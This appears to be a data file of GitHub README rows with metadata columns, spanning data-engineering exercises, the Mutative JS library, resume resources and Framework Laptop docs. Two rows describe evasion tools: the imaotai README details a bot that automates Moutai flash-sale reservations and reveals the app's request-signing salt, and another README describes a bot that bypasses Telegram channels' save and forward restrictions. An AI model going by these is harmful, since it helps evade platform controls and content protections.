`csv` files. You must create a data model / schema to hold these data sets, including indexes,
then create all the tables inside `Postgres` by connecting to the database with `Python`.
### Intermediate Exercises
#### Exercise 6 - Ingestion and Aggregation with PySpark.
The [sixth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-6)
is going to step it up a little and move on to more popular tools. In this exercise we are going
to load some files using `PySpark` and then be asked to do some basic aggregation.
Best of luck!
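For a feel of what such a load-and-aggregate step looks like in PySpark, here is an illustrative sketch; the file path and column names are placeholders, not the exercise's actual data.

```python
# Illustrative sketch only; the exercise supplies its own data files and questions.
from pyspark.sql import SparkSession
from pyspark.sql import functions as F

spark = SparkSession.builder.appName("exercise-6").getOrCreate()

# Placeholder path and column names.
df = spark.read.csv("data/*.csv", header=True, inferSchema=True)
result = df.groupBy("some_key").agg(F.avg("some_value").alias("avg_value"))
result.show()
```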
#### Exercise 7 - Using Various PySpark Functions
The [seventh exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-7)
Taking a page out of the previous exercise, this one focuses on using a few of the
more common built-in PySpark functions from `pyspark.sql.functions` and applying them
to real-life problems.
Many times to solve simple problems we have to find and use multiple functions available
from libraries. This will test your ability to do that.
#### Exercise 8 - Using DuckDB for Analytics and Transforms.
The [eighth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-8)
is all about DuckDB. Using new tools is imperative to growing as a Data Engineer, and DuckDB is one of those new tools. In this
exercise you will have to complete a number of analytical and transformation tasks using DuckDB. This
will require an understanding of DuckDB's functions and documentation.
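As a quick illustration of the DuckDB Python API (the file name and columns are placeholders, not the exercise's actual data):

```python
# Illustrative sketch only; the exercise defines the real files and tasks.
import duckdb

con = duckdb.connect()  # in-memory database

# read_csv_auto infers the schema of a CSV file; the file name is a placeholder.
rows = con.execute(
    "SELECT some_key, AVG(some_value) AS avg_value "
    "FROM read_csv_auto('data.csv') GROUP BY some_key"
).fetchall()
print(rows)
```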
#### Exercise 9 - Using Polars lazy computation.
The [ninth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-9)
is about Polars lazy computation. Polars is a new Rust-based tool with a wonderful Python package that has taken Data Engineering by
storm. It's better than Pandas because it has both a SQL context and supports lazy evaluation
for larger than memory data sets! Show your Lazy skills! | Data Engineering Practice Problems | null | 0 | 2 | 21 | 21 | 6 | 2 | 0 |
unadlib/mutative | # Mutative
<a href="https://mutative.js.org/" target="_blank"><img src="https://raw.githubusercontent.com/unadlib/mutative/main/website/static/img/mutative.png" height="120" alt="Mutative Logo" /></a>
![Node CI](https://github.com/unadlib/mutative/workflows/Node%20CI/badge.svg)
[![Coverage Status](https://coveralls.io/repos/github/unadlib/mutative/badge.svg?branch=main)](https://coveralls.io/github/unadlib/mutative?branch=main)
[![npm](https://img.shields.io/npm/v/mutative.svg)](https://www.npmjs.com/package/mutative)
![NPM Downloads](https://img.shields.io/npm/dm/mutative)
![license](https://flat-badgen.vercel.app/npm/license/mutative)
**Mutative** - A JavaScript library for efficient immutable updates, 2-6x faster than naive handcrafted reducer, and more than 10x faster than Immer.
**Why is Mutative faster than the spread operation (naive handcrafted reducer)?**
The spread operation has performance pitfalls, which can be detailed in the following article:
- <a href="https://www.richsnapp.com/article/2019/06-09-reduce-spread-anti-pattern" target="_blank">The reduce ({...spread}) anti-pattern</a>
- <a href="https://jonlinnell.co.uk/articles/spread-operator-performance?fbclid=IwAR0mElQwz2aOxl8rcsqoYwkcQDlcXcwuyIsTmTAbmyzrarysS8-BC1lSY9k" target="_blank">How slow is the Spread operator in JavaScript?</a>
Mutative's optimizations focus on shallow copy optimization, more complete lazy drafts, finalization process optimization, and more.
## Motivation
Writing immutable updates by hand is usually difficult, prone to errors, and cumbersome. Immer helps us write simpler immutable updates with "mutative" logic.
But its performance issues cause runtime overhead. Immer must have auto-freeze enabled by default (performance is even worse if auto-freeze is disabled), yet such frozen immutable state is not always what you need. In scenarios such as cross-process communication, remote data transfer, etc., we have to constantly freeze these immutable data.
There are more parts that could be improved, such as better type inference, non-intrusive markup, support for more types of immutability, safer immutability, [more edge cases](test/immer-non-support.test.ts), and so on.
This is why Mutative was created.
## Mutative vs Naive Handcrafted Reducer Performance
<details>
<summary><b>Mutative vs Reducer benchmark by object: </b></summary>
- Naive handcrafted reducer
```ts
// baseState type: Record<string, { value: number }>
const state = {
...baseState,
key0: {
...baseState.key0,
value: i,
},
};
```
- Mutative
```ts
const state = create(baseState, (draft) => {
draft.key0.value = i;
});
```
![Mutative vs Reducer benchmark by object](benchmark-object.jpg)
> Measure(seconds) to update the 1K-100K items object, lower is better([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark-object.ts)).
</details>
Mutative is up to 2x faster than naive handcrafted reducer for updating immutable objects.
<details>
<summary><b>Mutative vs Reducer benchmark by array: </b></summary>
- Naive handcrafted reducer
```ts
// baseState type: { value: number }[]
// slower 6x than Mutative
const state = [
{ ...baseState[0], value: i },
...baseState.slice(1, baseState.length),
];
// slower 2.5x than Mutative
// const state = baseState.map((item, index) =>
// index === 0 ? { ...item, value: i } : item
// );
// same performance as Mutative
// const state = [...baseState];
// state[0] = { ...baseState[0], value: i };
```
> The actual difference depends on which spread operation syntax you use.
- Mutative
```ts
const state = create(baseState, (draft) => {
draft[0].value = i;
});
```
![Mutative vs Reducer benchmark by array](benchmark-array.jpg)
> Measure(seconds) to update the 1K-100K items array, lower is better([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark-array.ts)).
</details>
Mutative is up to 6x faster than naive handcrafted reducer for updating immutable arrays.
## Mutative vs Immer Performance
> Mutative passed all of Immer's test cases.
Measure(ops/sec) to update 50K arrays and 1K objects, bigger is better([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark.ts)). [Mutative v1.0.5 vs Immer v10.1.1]
![Benchmark](benchmark.jpg)
```
Naive handcrafted reducer - No Freeze x 4,442 ops/sec ±0.38% (95 runs sampled)
Mutative - No Freeze x 6,199 ops/sec ±0.79% (89 runs sampled)
Immer - No Freeze x 5.30 ops/sec ±0.38% (18 runs sampled)
Mutative - Freeze x 974 ops/sec ±1.77% (92 runs sampled)
Immer - Freeze x 376 ops/sec ±0.67% (92 runs sampled)
Mutative - Patches and No Freeze x 969 ops/sec ±0.99% (97 runs sampled)
Immer - Patches and No Freeze x 5.27 ops/sec ±0.36% (18 runs sampled)
Mutative - Patches and Freeze x 514 ops/sec ±0.97% (95 runs sampled)
Immer - Patches and Freeze x 275 ops/sec ±0.74% (89 runs sampled)
The fastest method is Mutative - No Freeze
```
Run `yarn benchmark` to measure performance.
> OS: macOS 14.2.1, CPU: Apple M1 Max, Node.js: v20.11.0
Immer relies on auto-freeze to be enabled, if auto-freeze is disabled, Immer will have a huge performance drop and Mutative will have a huge performance lead, especially with large data structures it will have a performance lead of more than 50x.
So if you are using Immer, you will have to enable auto-freeze for performance. Mutative has auto-freeze disabled by default. With the default configuration of both, we can see the 16x performance gap between Mutative (`6,199 ops/sec`) and Immer (`376 ops/sec`).
Overall, Mutative has a huge performance lead over Immer in [more performance testing scenarios](https://github.com/unadlib/mutative/tree/main/test/performance). Run `yarn performance` to get all the performance results locally.
<details>
<summary><b>More Performance Testing Scenarios, Mutative is up to `2.5X-73.8X` faster than Immer: </b></summary>
![Mutative vs Immer - All benchmark results by average multiplier](test/benchmark/results/all.jpg)
> [view source](https://github.com/unadlib/mutative/blob/main/test/benchmark).
</details>
## Features and Benefits
- **Mutation makes immutable updates** - Immutable data structures supporting objects, arrays, Sets and Maps.
- **High performance** - 10x faster than Immer by default, even faster than a naive handcrafted reducer.
- **Optional freezing state** - No freezing of immutable data by default.
- **Support for JSON Patch** - Full compliance with JSON Patch specification.
- **Custom shallow copy** - Support for more types of immutable data.
- **Support mark for immutable and mutable data** - Allows for non-invasive marking.
- **Safer mutable data access in strict mode** - It brings more secure immutable updates.
- **Support for reducer** - Support reducer function and any other immutable state library.
## Difference between Mutative and Immer
| | Mutative | Immer |
| :------------------------------------ | -------: | :---: |
| Custom shallow copy | ✅ | ❌ |
| Strict mode | ✅ | ❌ |
| No data freeze by default | ✅ | ❌ |
| Non-invasive marking | ✅ | ❌ |
| Complete freeze data | ✅ | ❌ |
| Non-global config | ✅ | ❌ |
| async draft function | ✅ | ❌ |
| Fully compatible with JSON Patch spec | ✅ | ❌ |
Mutative has fewer bugs such as accidental draft escapes than Immer, [view details](https://github.com/unadlib/mutative/blob/main/test/immer-non-support.test.ts).
## Installation
Yarn
```sh
yarn add mutative
```
NPM
```sh
npm install mutative
```
CDN
- Unpkg: `<script src="https://unpkg.com/mutative"></script>`
- JSDelivr: `<script src="https://cdn.jsdelivr.net/npm/mutative"></script>`
## Usage
```ts
import { create } from 'mutative';
const baseState = {
foo: 'bar',
list: [{ text: 'coding' }],
};
const state = create(baseState, (draft) => {
draft.list.push({ text: 'learning' });
});
expect(state).not.toBe(baseState);
expect(state.list).not.toBe(baseState.list);
```
`create(baseState, (draft) => void, options?: Options): newState`
The first argument of `create()` is the base state. Mutative drafts it and passes it to the arguments of the draft function, and performs the draft mutation until the draft function finishes, then Mutative will finalize it and produce the new state.
Use `create()` for more advanced features by [setting `options`](#createstate-fn-options).
## APIs
- [`create()`](#create)
- [`apply()`](#apply)
- [`current()`](#current)
- [`original()`](#original)
- [`unsafe()`](#unsafe)
- [`isDraft()`](#isdraft)
- [`isDraftable()`](#isdraftable)
- [`rawReturn()`](#rawreturn)
- [`makeCreator()`](#makecreator)
- [`markSimpleObject()`](#marksimpleobject)
### `create()`
Use `create()` for draft mutation to get a new state, which also supports currying.
```ts
import { create } from 'mutative';
const baseState = {
foo: 'bar',
list: [{ text: 'todo' }],
};
const state = create(baseState, (draft) => {
draft.foo = 'foobar';
draft.list.push({ text: 'learning' });
});
```
In this basic example, the changes to the draft are 'mutative' within the draft callback, and `create()` is finally executed with a new immutable state.
#### `create(state, fn, options)`
> The `options` argument is optional.
- strict - `boolean`, the default is false.
> Forbid accessing non-draftable values in strict mode(unless using [unsafe()](#unsafe)).
> When strict mode is enabled, mutable data can only be accessed using [`unsafe()`](#unsafe).
> **It is recommended to enable `strict` in development mode and disable `strict` in production mode.** This will ensure safe explicit returns and also keep good performance in the production build. If the value that does not mix any current draft or is `undefined` is returned, then use [rawReturn()](#rawreturn).
- enablePatches - `boolean | { pathAsArray?: boolean; arrayLengthAssignment?: boolean; }`, the default is false.
> Enable patch, and return the patches/inversePatches.
> If you need to control the shape of the generated patches in more detail, you can set `pathAsArray` and `arrayLengthAssignment`. `pathAsArray` defaults to `true`; if it's `true`, the path will be an array, otherwise it is a string. `arrayLengthAssignment` defaults to `true`; if it's `true`, the array length will be included in the patches, otherwise the array length is not included (**NOTE**: If `arrayLengthAssignment` is `false`, it is fully compatible with the JSON Patch spec, but it may have additional performance loss), [view related discussions](https://github.com/unadlib/mutative/issues/6).
- enableAutoFreeze - `boolean`, the default is false.
> Enable autoFreeze, and return frozen state, and enable circular reference checking only in `development` mode.
- mark - `(target) => ('mutable'|'immutable'|function) | (target) => ('mutable'|'immutable'|function)[]`
> Set a mark to determine if the value is mutable or if an instance is an immutable, and it can also return a shallow copy function(`AutoFreeze` and `Patches` should both be disabled, Some patches operation might not be equivalent).
> When the mark function is (target) => 'immutable', it means all the objects in the state structure are immutable. In this specific case, you can totally turn on `AutoFreeze` and `Patches`.
> `mark` supports multiple marks, and the marks are executed in order, and the first mark that returns a value will be used.
> When an object tree node is marked `mutable` by the `mark` function, all of its child nodes will also not be drafted by Mutative and will retain their original values.
#### `create()` - Currying
- create `draft`
```ts
const [draft, finalize] = create(baseState);
draft.foobar.bar = 'baz';
const state = finalize();
```
> Support set options such as `const [draft, finalize] = create(baseState, { enableAutoFreeze: true });`
- create `producer`
```ts
const produce = create((draft) => {
draft.foobar.bar = 'baz';
});
const state = produce(baseState);
```
> Also support set options such as `const produce = create((draft) => {}, { enableAutoFreeze: true });`
### `apply()`
Use `apply()` for applying patches to get the new state.
```ts
import { create, apply } from 'mutative';
const baseState = {
foo: 'bar',
list: [{ text: 'todo' }],
};
const [state, patches, inversePatches] = create(
baseState,
(draft) => {
draft.foo = 'foobar';
draft.list.push({ text: 'learning' });
},
{
enablePatches: true,
}
);
const nextState = apply(baseState, patches);
expect(nextState).toEqual(state);
const prevState = apply(state, inversePatches);
expect(prevState).toEqual(baseState);
```
### `current()`
Get the current value from a draft.
- For any draft where a child node has been modified, the state obtained by executing current() each time will be a new reference object.
- For a draft where no child nodes have been modified, executing current() will always return the original state.
> It is recommended to minimize the number of times current() is executed when performing read-only operations, ideally executing it only once.
```ts
const state = create({ a: { b: { c: 1 } }, d: { f: 1 } }, (draft) => {
draft.a.b.c = 2;
expect(current(draft.a)).toEqual({ b: { c: 2 } });
// The node `a` has been modified.
expect(current(draft.a) === current(draft.a)).toBeFalsy();
// The node `d` has not been modified.
expect(current(draft.d) === current(draft.d)).toBeTruthy();
});
```
### `original()`
Get the original value from a draft.
```ts
const baseState = {
foo: 'bar',
list: [{ text: 'todo' }],
};
const state = create(baseState, (draft) => {
draft.foo = 'foobar';
draft.list.push({ text: 'learning' });
expect(original(draft.list)).toEqual([{ text: 'todo' }]);
});
```
### `unsafe()`
When strict mode is enabled, mutable data can only be accessed using `unsafe()`.
```ts
const baseState = {
list: [],
date: new Date(),
};
const state = create(
baseState,
(draft) => {
unsafe(() => {
draft.date.setFullYear(2000);
});
// or return the mutable data:
// const date = unsafe(() => draft.date);
},
{
strict: true,
}
);
```
### `isDraft()`
Check if a value is a draft.
```ts
const baseState = {
date: new Date(),
list: [{ text: 'todo' }],
};
const state = create(baseState, (draft) => {
expect(isDraft(draft.date)).toBeFalsy();
expect(isDraft(draft.list)).toBeTruthy();
});
```
### `isDraftable()`
Check if a value is draftable
```ts
const baseState = {
date: new Date(),
list: [{ text: 'todo' }],
};
expect(isDraftable(baseState.date)).toBeFalsy();
expect(isDraftable(baseState.list)).toBeTruthy();
```
> You can set a mark to determine if the value is draftable, and the mark function should be the same as passing in `create()` mark option.
### `rawReturn()`
For return values that do not contain any drafts, you can use `rawReturn()` to wrap the return value to improve performance. It ensures that the value is only returned explicitly.
```ts
const baseState = { id: 'test' };
const state = create(baseState as { id: string } | undefined, (draft) => {
return rawReturn(undefined);
});
expect(state).toBe(undefined);
```
> If the return value mixes drafts, you should not use `rawReturn()`.
```ts
const baseState = { a: 1, b: { c: 1 } };
const state = create(baseState, (draft) => {
if (draft.b.c === 1) {
return {
...draft,
a: 2,
};
}
});
expect(state).toEqual({ a: 2, b: { c: 1 } });
expect(isDraft(state.b)).toBeFalsy();
```
If you use `rawReturn()`, we recommend that you enable `strict` mode in development.
```ts
const baseState = { a: 1, b: { c: 1 } };
const state = create(
baseState,
(draft) => {
if (draft.b.c === 1) {
return rawReturn({
...draft,
a: 2,
});
}
},
{
strict: true,
}
);
// it will warn `The return value contains drafts, please don't use 'rawReturn()' to wrap the return value.` in strict mode.
expect(state).toEqual({ a: 2, b: { c: 1 } });
expect(isDraft(state.b)).toBeFalsy();
```
### `makeCreator()`
`makeCreator()` only takes [options](#createstate-fn-options) as the first argument, resulting in a custom `create()` function.
```ts
const baseState = {
foo: {
bar: 'str',
},
};
const create = makeCreator({
enablePatches: true,
});
const [state, patches, inversePatches] = create(baseState, (draft) => {
draft.foo.bar = 'new str';
});
```
### `markSimpleObject()`
`markSimpleObject()` is a mark function that marks all plain objects as immutable.
```ts
const baseState = {
foo: {
bar: 'str',
},
simpleObject: Object.create(null),
};
const state = create(
baseState,
(draft) => {
draft.foo.bar = 'new str';
draft.simpleObject.a = 'a';
},
{
mark: markSimpleObject,
}
);
expect(state.simpleObject).not.toBe(baseState.simpleObject);
```
[View more API docs](./docs/README.md).
## Using TypeScript
- `castDraft()`
- `castImmutable()`
- `Draft<T>`
- `Immutable<T>`
- `Patches`
- `Patch`
- `Options<O, F>`
## Integration with React
- [use-mutative](https://github.com/mutativejs/use-mutative) - A 2-6x faster alternative to useState with spread operation
- [use-travel](https://github.com/mutativejs/use-travel) - A React hook for state time travel with undo, redo, reset and archive functionalities.
## FAQs
- I'm already using Immer, can I migrate smoothly to Mutative?
Yes. Unless you have to be compatible with Internet Explorer, Mutative supports almost all of Immer's features, and you can easily migrate from Immer to Mutative.
> Migration is also not possible on React Native versions that do not support Proxy. React Native switched to a new JS engine during refactoring - Hermes, and it (if < v0.59 or when using the Hermes engine on React Native < v0.64) does [not support Proxy on Android](https://github.com/facebook/hermes/issues/33), but [React Native v0.64 with the Hermes engine supports Proxy](https://reactnative.dev/blog/2021/03/12/version-0.64#hermes-with-proxy-support).
- Can Mutative be integrated with Redux?
Yes. Mutative supports return values for reducer, and `redux-toolkit` is considering support for [configurable `produce()`](https://github.com/reduxjs/redux-toolkit/pull/3074).
## Migration from Immer to Mutative
> [mutative-compat](https://github.com/exuanbo/mutative-compat) - Mutative wrapper with full Immer API compatibility, you can use it to quickly migrate from Immer to Mutative.
1. `produce()` -> `create()`
Mutative's auto-freeze option is disabled by default, while Immer's auto-freeze option is enabled by default (if disabled, Immer's performance drops much further).
> You need to check if auto freezing has any impact on your project. If it depends on auto freezing, you can enable it yourself in Mutative.
```ts
import produce from 'immer';
const nextState = produce(baseState, (draft) => {
draft[1].done = true;
draft.push({ title: 'something' });
});
```
Use Mutative
```ts
import { create } from 'mutative';
const nextState = create(baseState, (draft) => {
draft[1].done = true;
draft.push({ title: 'something' });
});
```
2. `Patches`
```ts
import { produceWithPatches, applyPatches, enablePatches } from 'immer';
enablePatches();
const baseState = {
age: 33,
};
const [nextState, patches, inversePatches] = produceWithPatches(
baseState,
(draft) => {
draft.age++;
}
);
const state = applyPatches(nextState, inversePatches);
expect(state).toEqual(baseState);
```
Use Mutative
```ts
import { create, apply } from 'mutative';
const baseState = {
age: 33,
};
const [nextState, patches, inversePatches] = create(
baseState,
(draft) => {
draft.age++;
},
{
enablePatches: true,
}
);
const state = apply(nextState, inversePatches);
expect(state).toEqual(baseState);
```
3. Return `undefined`
```ts
import produce, { nothing } from 'immer';
const nextState = produce(baseState, (draft) => {
return nothing;
});
```
Use Mutative
```ts
import { create, rawReturn } from 'mutative';
const nextState = create(baseState, (draft) => {
return rawReturn(undefined);
});
```
## Contributing
Mutative's goal is to provide efficient immutable updates. The focus is on performance improvements and better APIs for a better development experience. We are still working on it and welcome PRs that may help Mutative.
Development Workflow:
- Clone Mutative repo.
- Run `yarn install` to install all the dependencies.
- Run `yarn prettier` to format the code.
- `yarn test --watch` runs an interactive test watcher.
- Run `yarn commit` to make a git commit.
## License
Mutative is [MIT licensed](https://github.com/unadlib/mutative/blob/main/LICENSE).
| Efficient immutable updates, 2-6x faster than naive handcrafted reducer, and more than 10x faster than Immer. | immer,immutability,immutable,reducer,redux,mutable,mutation,state-management,mutative,react | 23 | 7 | 18 | 432 | 6 | 16 | 3 |
insoxin/imaotai | # imaotai
Automatic daily reservations in the i茅台 (iMoutai) app to grab Moutai.
The software is free and makes no profit; do not trust anyone charging for it. The only update address is https://github.com/insoxin/imaotai/
Update: Recently many people have emailed me saying the new app version doesn't work and that the old client prompts them to upgrade. I won't say much about this. Not long after this project was published, someone from Kweichow Moutai added me on WeChat Work and we talked a lot; I was also invited for a visit and got a few free meals. Having accepted their hospitality, I have stopped updating this project (one of the reasons). If you are studying or researching this, you can refer to the retired algorithms in the older posts on my blog.
**Another update: opening my inbox to hundreds of emails every weekend is getting in the way, so I created a WeChat discussion group. There is no finished software in the group, and joining costs 200 CNY. If you want to join, leave a note with "imaotai + your email" and I will send you an invitation when I see it.**
![image.png](https://raw.githubusercontent.com/insoxin/API/master/Sponsor.jpg)
# Usage
## 1. Pull the image
```docker
docker pull insoxin/imaotai:latest
```
## 2. Create the container
```docker
docker run -dit --name imaotai -p 1499:1499 -v $PWD/imaotai/config:/go/src/imaotai/config --restart unless-stopped insoxin/imaotai:latest
```
## 3. Configure parameters
### Configure config.json
Download https://github.com/insoxin/imaotai/blob/main/config/config.json to /root/imaotai/config/config.json on your machine.
Edit the parameters in the local /root/imaotai/config/config.json.
`User-Agent`, `Client_Secret`, and `Cookie` are required.
Also, do not leave the latitude/longitude at their defaults (the app's location data follows AMap/Gaode Maps); the program will make the reservation at the nearest store.
If you don't want to reserve at stores that are too far away, set the `GeoKM` parameter; the default of 0 means no distance limit.
For other settings you don't understand, the defaults are fine.
By default it runs at 9:00 every day (using Taobao's time API) and reserves the first four products fetched from the reservation/flash-sale page.
### Configure sendNotify.js notifications
Download https://github.com/insoxin/imaotai/blob/main/config/sendNotify.js to /root/imaotai/config/sendNotify.js on your machine.
sendNotify.js is the notification file; modify it as needed.
```json
{
"Main": {
"Title": "insoxin/imaotai",
"Open": "1,2,3,4",
"cron": "0 0 9 * * *",
"Tzone": "http://api.m.taobao.com/rest/api3.do?api=mtop.common.getTimestamp",
"MT-APP-Version": "1.0.0",
"GeoN": "26.598194",
"GeoE": "106.707410",
"GeoKM":"0",
"sendNotify": "/config/sendNotify.js",
"oksendNotify": "true"
},
"user": {
"Cookie": "",
"Origin": "https://h5.moutai519.com.cn",
"Client_Secret": "aaa",
"User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 moutaiapp/1.0.6 device-id/insoxin/imaotai"
},
"Notice": "通知中的标题"
}
```
MD5(2af72f100c356273d46284f6fd1dfc08 + sorted data + timestamp)
https://blog.isoyu.com/archives/imaotaimt-device-idmt-r-md5jiajiemi.html
## 4. Restart imaotai
## 5. Give this repo a star, then go to https://github.com/insoxin/ and follow me; if this project gets banned I will publish a new project right away
![image.png](https://blog.isoyu.com/wp-content/uploads/2022/04/2022040300072260.jpg)
| i茅台app 每日自动预约 抢茅台 | null | 1 | 2 | 1 | 42 | 0 | 1 | 0 |
vasusen-code/SaveRestrictedContentBot | <h1 align="center">
<b>Save restricted content Bot</b>
</h1>
Contact: [Telegram](https://t.me/MaheshChauhan)
A stable telegram bot to get restricted messages with custom thumbnail support, made by Mahesh Chauhan.
- works for both public and private chats
- Custom thumbnail support for Pvt medias
- supports text and webpage media messages
- Faster speed
- Forcesubscribe available
- To save from bots send link in this format : `t.me/b/bot_username/message_id` (use plus messenger for message_id)
- `/batch` - (For owner only) Use this command to save upto 100 files from a pvt or public restricted channel at once.
- `/cancel` - Use this to stop batch
- Time delay is added to avoid FloodWait and keep user account safe.
# Variables
- `API_ID`
- `API_HASH`
- `SESSION`
- `BOT_TOKEN`
- `AUTH` - Owner user id
- `FORCESUB` - Public channel username without '@'. Don't forget to add bot in channel as administrator.
# Get API & PYROGRAM string session from:
API: [API scrapper Bot](https://t.me/USETGSBOT) or [Telegram.org](https://my.telegram.org/auth)
PYROGRAM SESSION: [SessionGen Bot](https://t.me/SessionStringGeneratorRobot) or [![Run on Repl.it](https://replit.com/badge/github/vasusen-code/saverestrictedcontentbot)](https://replit.com/@levinalab/Session-Generator#main.py)
BOT TOKEN: @Botfather on telegram
# Deploy
Deploy on `VPS`
Easy Method:
- Install docker-compose
- Fill in the variables in docker-compose.yml file using your favorite text editor or nano
- Start the container
```
sudo apt install docker-compose -y
nano docker-compose.yml
sudo docker-compose up --build
```
The hard Way:
- Fill vars in your fork in [this](https://github.com/vasusen-code/SaveRestrictedContentBot/blob/master/main/__init__.py) file as shown in this [picture](https://t.me/MaheshChauhan/36)
- enter all the below commands
```
sudo apt update
sudo apt install ffmpeg git python3-pip
git clone your_repo_link
cd saverestrictedcontentbot
pip3 install -r requirements.txt
python3 -m main
```
- if you want bot to be running in background then enter `screen -S srcb` before `python3 -m main`
- after `python3 -m main`, click ctrl+A, ctrl+D
- if you want to stop bot, then enter `screen -r srcb` and to kill screen enter `screen -S srcb -X quit`.
Deploy your bot on `Render`
Tutorial - [Click here](https://telegra.ph/SRCB-on-Render-05-17)
Deploy your bot on `heroku`
» Method - 1:
- Star the repo, and fork it in desktop mode
- Go to settings of your forked repo
- Rename your repo by any other name
- Click on [![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy)
» Method - 2:
- Star the repo, and fork it in desktop mode
- create app in heroku
- go to settings of app›› config vars›› add all variables
- add buildpacks
- connect to github and deploy
- turn on dynos
Buildpacks for manual deploy:
- `heroku/python`
- `https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest.git`
Deploy your bot on `Okteto` [Useless]
Tutorial for okteto - [click here](https://telegra.ph/Okteto-Deploy-04-01)
[![Develop on Okteto](https://okteto.com/develop-okteto.svg)](https://cloud.okteto.com)
| Stable telegram bot to save Restricted content with custom thumbnail support. | telegram,bot,telegram-bot,save,restricted,content,forward,clone | 0 | 3 | 61 | 656 | 50 | 3 | 0 |
codingmonster-tv/Awesome_Resume_Portfolio | # Awesome_Resume_Portfolio
A repo collecting resources that are useful when developers prepare their application documents.
- [**Resume format/examples quick link**](https://docs.google.com/document/d/1Y2Y7-DWO-0F68nsUxB-ObYbXTdQgBHu-Fw48yTYG6R0/edit?usp=sharing)
The resume format provided in this repo is 100% my own opinion, based on experience with job hunting and hiring through various mentoring and consulting sessions. If it is not to your taste, feel free to adapt it as you see fit.
**Features**
- Items that lag behind current developer hiring trends have been removed
- Photos, home addresses, long-winded personal essays, stiff 사람X/X코리아-style tables, useless aptitude test reports, etc.
- Items that I wish were written in more detail have been added
- A summary of your technical competencies and a summary of your experience
- A sample resume and several real-world examples are provided
- Since many cases were considered, some content may be unnecessary for you
- Delete or modify it to fit your own situation
## Resume Format and Samples
### How to Use
1. Open the following Google Docs document: [**Resume format/examples quick link**](https://docs.google.com/document/d/1Y2Y7-DWO-0F68nsUxB-ObYbXTdQgBHu-Fw48yTYG6R0/edit?usp=sharing)
2. Make a copy to your own Drive using "Make a copy", then edit it <img width="948" alt="image" src="https://user-images.githubusercontent.com/7837143/154478978-bd755bfe-3250-4c58-a6d6-c9f3b22e75a4.png">
3. Write your resume by referring to the writing guide below and the sample resumes
4. When submitting it somewhere, export it as a PDF using Google Docs' print feature, or submit it via a share link
5. Star this repo
### Resume Examples Worth Referencing
| Owner | Position | Notes |
| ------------- | ------------- | ------------- |
| [코몬 (Repo Owner)'s resume](http://dongyi.kim) | Machine Learning Engineer | Google Docs |
| [김현준 of Kakao Pay](https://www.youtube.com/watch?v=8xvYz0ldfEI) | Android Engineer | Notion portfolio |
| [이정윤 of Daangn (Karrot Market)](https://promm.dev/about/) | Frontend Engineer | Web resume |
| [김석현 (Lob) of Kakao Style](https://dev-lob.notion.site/26-Junior-Backend-Developer-e51c02b15e89401abe00604d95d4846d) | Backend Engineer | Notion portfolio |
| [Samchon, startup lead developer](https://github.com/samchon/resume) | Backend Engineer | GitHub resume |
| [Y0on2q (윤익후) of CHAI Corporation](https://github.com/ltnscp9028/Awesome_Resume_Portfolio/files/8951089/y0on2q_resume_rc3_mark.pdf) | Backend Engineer | Adobe XD PDF |
| [박준성 of LINE Plus](https://writtic.me) | Machine Learning Engineer | Notion portfolio |
| [강철민 of Lunit](https://github.com/codingmonster-tv/Awesome_Resume_Portfolio/files/8949609/Cholmin.Kang_CV_Final.pdf) | Machine Learning Researcher | LaTeX PDF |
| [박진우 of GE](https://github.com/codingmonster-tv/Awesome_Resume_Portfolio/files/8950899/Resume-Jinwoo-2022.mid_Descrete.pdf) | Embedded Engineer | Word PDF |
### Good Resources
1. [YouTube - Traits of developer portfolios that fail document screening](https://www.youtube.com/watch?v=PJGsPohDuoA)
2. [YouTube - Everything about writing an entry-level developer resume, part 1, with 나동빈's resume](https://www.youtube.com/watch?v=qeFJ6UwjxmU)
3. [YouTube - Reviewing and editing a junior developer's 'real' resume](https://www.youtube.com/watch?v=1bcmmc2rTBE)
| 개발자를 위한 이력서 작성 가이드, 포맷 그리고 다양한 예시들 | resume,cv,coverletter,portfolio | 0 | 5 | 6 | 32 | 1 | 1 | 0 |
FrameworkComputer/Framework-Laptop-13 | # Framework Laptop 13
Documentation for the Mainboard and other key modules in the Framework Laptop 13 (available at https://frame.work/marketplace/mainboards).
We designed the Mainboard from the start as a standalone module to make upgrades easy in the Framework Laptop and to also work great as a high-performance single board computer using Intel’s 11th Gen Intel Core, 12th Gen Intel Core, and 13th Gen Intel Core processors along with AMD's Ryzen 7040 Series processors. All you need to do is insert memory, plug in a USB-C power adapter, and hit the tiny power button on-board, and you’ve got a powered-up computer. You can also pick up parts like a Bottom Cover Kit, Input Cover Kit, or Battery from the Marketplace to extend your setup with. See more on this at https://frame.work/blog/mainboard-availability-and-open-source-release.
We want to make it as easy as possible to build new projects and products that use the Mainboard, so this repository contains 2D and 3D CAD as well as electrical documentation to help you get started.
![mainboard_spread](https://user-images.githubusercontent.com/28994301/155036191-9f03d3c9-7e09-4d69-83da-5ba8b3641d95.jpg)
## License
Framework Laptop 13 © 2022 by Framework Computer Inc is licensed under CC BY 4.0.
To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/
## 3D CAD (in the base directory)
External 3D CAD of the system and main modules to enable development of 3D-printed replacement parts,
skins, cases, and other accessories. We're excited to see what you do with it!
## Mainboard
![Case](https://user-images.githubusercontent.com/28994301/187817348-42792225-093a-4b99-b51d-f74d154b59f4.png)
This contains 2D drawings of the Mainboard along with a couple of example 3D-printable cases.
Both of these are easy to print on home 3D printers. Since these are open source, you are free to modify, remix, and redistribute them however you’d like to.
It also contains the pinouts and part numbers of the connectors on the Mainboard.
All of this is a starting point for a broader set of open source Mainboard documentation to enable creation of fully compatible third-party Mainboards in the future.
## Battery
2D drawings, 3D CAD, and the pinout of the Battery to enable re-use.
## Display
2D drawings, 3D CAD, and the pinout of the Display to enable re-use.
## Fingerprint Reader
Pinout of the Fingerprint Reader.
## Touchpad
Pinout of the Touchpad connectors.
## Webcam
